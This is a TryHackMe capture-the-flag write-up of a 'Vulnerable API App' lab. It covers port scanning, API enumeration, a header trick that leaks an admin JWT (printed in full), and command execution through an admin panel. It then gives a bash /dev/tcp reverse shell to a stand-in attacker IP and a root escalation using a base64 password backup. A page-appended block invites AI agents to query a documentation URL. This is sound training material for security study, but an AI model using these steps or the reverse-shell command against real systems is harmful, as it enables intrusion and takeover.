# Vulnerable API App ## Target Details * Target IP: 10.10.149.135 ## Service Discovery * Scan Open ports using nmap ```bash $ sudo nmap -sS -sV -sC -Pn -A -oN nmap.txt 10.10.149.135 Nmap scan report for 10.10.149.135 Host is up (0.45s latency). Not shown: 997 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 86:65:28:5a:90:b3:1f:8e:9c:0b:62:3a:71:4b:97:37 (RSA) | 256 87:37:9b:9d:fc:c4:dd:bc:21:0c:d9:a2:ab:96:90:be (ECDSA) |_ 256 a2:fd:4a:10:db:5b:ce:3d:c2:2c:c0:0c:8f:be:6c:41 (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-title: Welcome to nginx! |_http-server-header: nginx/1.18.0 (Ubuntu) 5000/tcp open upnp? | fingerprint-strings: | GenericLines: | HTTP/1.1 400 Bad Request ... ... Network Distance: 4 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 143/tcp) HOP RTT ADDRESS 1 354.40 ms 10.2.0.1 2 ... 3 4 447.88 ms 10.10.149.135 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . ``` * Services Found: | Service | Port | Version | | :---------: | :--: | ------------- | | SSH | 22 | OpenSSH 8.2p1 | | nginx HTTP | 80 | /1.18.0 | | Web Service | 5000 | Unknown | * Answer the Task questions ## Content Discovery * Visit the web application in browser * Common endpoints are /api or api.domain.com, > /api worked! * We can find other endpoints by manually by crawling through the web application with burpsuite proxy running * On inspecting the html, the admin has left a message in webpage comment for the hacker! ```html ``` > from comment we can make conclusion that, we cannot directly sign up from the login page, we need to find api endpoint to sign up. admin has also provided hint to the endpoint for users sign up * On visiting `/api/users` endpoint, we get json response, providing information about other users!! ```json { "users": [ { "userid": 1, "first_name": "Martin", "last_name": "Rodriguez", "admin": false }, { "userid": 2, "first_name": "Kristen", "last_name": "Martin", "admin": false }, .... { "userid": 27, "first_name": "Derek", "last_name": "Washington", "admin": true } ] } ``` > We got user details names, user Id and their role while using the application * In most of the cases, endpoint supports various http methods, let's verify it using `OPTIONS` method. Let's visit the same users enpoint and send the request to repeater this time, and change HTTP method from `GET` to `POST` ```bash GET /api/users HTTP/1.1 # change to OPTIONS /api/users HTTP/1.1 ``` * On visiting `dmdhrumilmistry` GitHub Profile repos, [Vulnerable-API-App](https://github.com/dmdhrumilmistry/Vulnerable-API-App) [app.py](https://github.com/dmdhrumilmistry/Vulnerable-API-App/blob/main/app.py) file, we can retrieve all the endpoints from the file. The useful ones for now are listed below. * Endpoints Discovered using burpsuite | Endpoint | HTTP Methods Allowed | | :---------: | -------------------------- | | /api/users/ | DELETE, HEAD, OPTIONS, GET | | /api/users | POST, OPTIONS, HEAD, GET | ## Exploit Endpoints * from `/api/user/` endpoint we can get user details, from `/api/users` endpoint we can retrieve admin user id and try to get their account details. For my case admin id is `27`. > admin id will vary * Send Burp Request to `/api/user/27`, we'll receive json response as ```json { "admin": true, "first_name": "Derek", "last_name": "Washington", "userid": 27 } ``` * Using first question hint, we know that we need to send `Hide-Info` header in the HTTP request. * Burp Request ```http GET /api/user/27 HTTP/1.1 Hide-Info: 0 ``` * Burp Json Response ```json { "admin": true, "email": "admin@vuln-api-app.com", "first_name": "Derek", "last_name": "Washington", "token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTY1NzcwODY4OSwianRpIjoiYjBhNzdmODgtZjcyMS00ZjhkLTgyOGUtYWRlNzIwZjI3ODcwIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImFkbWluQHZ1bG4tYXBpLWFwcC5jb20iLCJuYmYiOjE2NTc3MDg2ODl9.94MZ1fRrRrIdt_FFnLQdjGMWHbvA5_cSnwYfiaVl0Jw", "userid": 27 } ``` > Now we've received token * We can add token in BurpSuite every request using Custom Header Extension, Refer [docs](https://portswigger.net/bappstore/807907f5380c4cb38748ef4fc1d8cdbc) for installation and usage, then add authorization token to extension. * Now, Add `http://10.10.149.135:5000`, and capture in scope requests only. * configure Custom Header extension to add header while using proxy using * Project Options * Sessions * From Session Handling rules click on add button * provide description * Click on Add button from Rule Actions * Choose `Invoke Burp Extension` * Set extension handler to `Add Custom Header` * Click on OK * From Scope tab, click on Proxy checkbox to add headers while using proxy. Also set URL scope to set Suite Scope * Click on OK * Visit HomePage `http://10.10.149.135:5000` ## Get Target Machine Shell * Visit HomePage, with login admin auth token * From HomePage, visit Admin Controls tab, from where we can run bash commands * Using [GTFObins Bash Reverse Shell](https://gtfobins.github.io/gtfobins/bash/#reverse-shell) get access to reverse shell * Start Netcat on attacker's machine ```bash nc -nlvp 4444 ``` * Enter below command in command input field ```bash bash -c 'exec bash -i &>/dev/tcp/ATTACKER_THM_IP/4444 <&1' ``` * On Execution of command, we get a reverse shell on the attacker machine ```bash $ nc -nlvp 4444 listening on [any] 4444 ... connect to [ATTACKER_THM_IP] from (UNKNOWN) [10.10.226.214] 33472 bash: cannot set terminal process group (610): Inappropriate ioctl for device bash: no job control in this shell vulnadmin@vulnapiapp:~/deployment/apps/Vulnerable-API-app$ ``` ## Get User Flag * Read User Flag ```bash vulnadmin@vulnapiapp:~/deployment/apps/Vulnerable-API-app$ cat $HOME/user.txt THM{REDACTED} ``` ## Privilege Escalation * Checking if `vulnadmin` has sudo permissions ```bash vulnadmin@vulnapiapp:~$ groups sudo adm cdrom dip plugdev lxd ``` > `vulnadmin` has sudo permission, but first we need to find its password to run sudo command * On Listing Files in `vulnadmin` home directory, we find a `backup.txt` file ```bash vulnadmin@vulnapiapp:~$ ls -l total 12 -rw-rw-r-- 1 vulnadmin vulnadmin 45 Jul 12 14:58 backup.txt drwxrwxr-x 3 vulnadmin vulnadmin 4096 Jul 12 11:27 deployment -rw-rw-r-- 1 vulnadmin vulnadmin 30 Jul 12 13:21 user.txt ``` * On Reading file, it seems to be encoded in base64 format * Decode backup.txt file ```bash vulnadmin@vulnapiapp:~$ cat backup.txt | base64 -d {REDACTED} ``` > It's password for `vulnadmin` account * To run sudo command we need to spawn terminal first, since the deployed application is running flask which is a python framework, python must be installed which can be verified using ```bash vulnadmin@vulnapiapp:~$ python3 --version Python 3.8.10 ``` * Get Interactive Shell ```bash vulnadmin@vulnapiapp:~$ python3 -c 'import pty;pty.spawn("/bin/bash")' ``` * List commands which can be run as with root privileges by `vulnadmin` ```bash vulnadmin@vulnapiapp:~$ sudo su [sudo] password for vulnadmin: {REDACTED} root@vulnapiapp:/home/vulnadmin/# ``` * Get Root Flag ```bash root@vulnapiapp:~# cat /root/root.txt cat /root/root.txt THM{REDACTED} ``` * We've successfully Rooted the machine!! --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://dmdhrumilmistry.gitbook.io/home/blog/tryhackme-writeups/vunerable-api-app.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.